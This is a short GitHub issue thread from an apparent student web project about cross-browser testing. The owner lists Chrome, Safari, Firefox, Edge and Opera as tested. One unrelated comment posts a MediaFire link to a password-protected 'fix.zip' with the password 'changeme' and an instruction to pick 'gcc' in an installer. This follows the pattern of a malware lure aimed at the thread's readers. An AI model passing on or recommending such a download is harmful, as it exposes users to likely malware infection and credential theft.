### ISSUE TITLE
Cross browser testing

### ISSUE THREAD

**Issue by Jereriviel** [Jereriviel/semester-project-1#36]
Test the website in the following browsers:

- [x] Chrome
- [x] Safari
- [x] Firefox
- [x] Edge
- [x] Opera

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jereriviel** [comment]
Cross browser testing done.
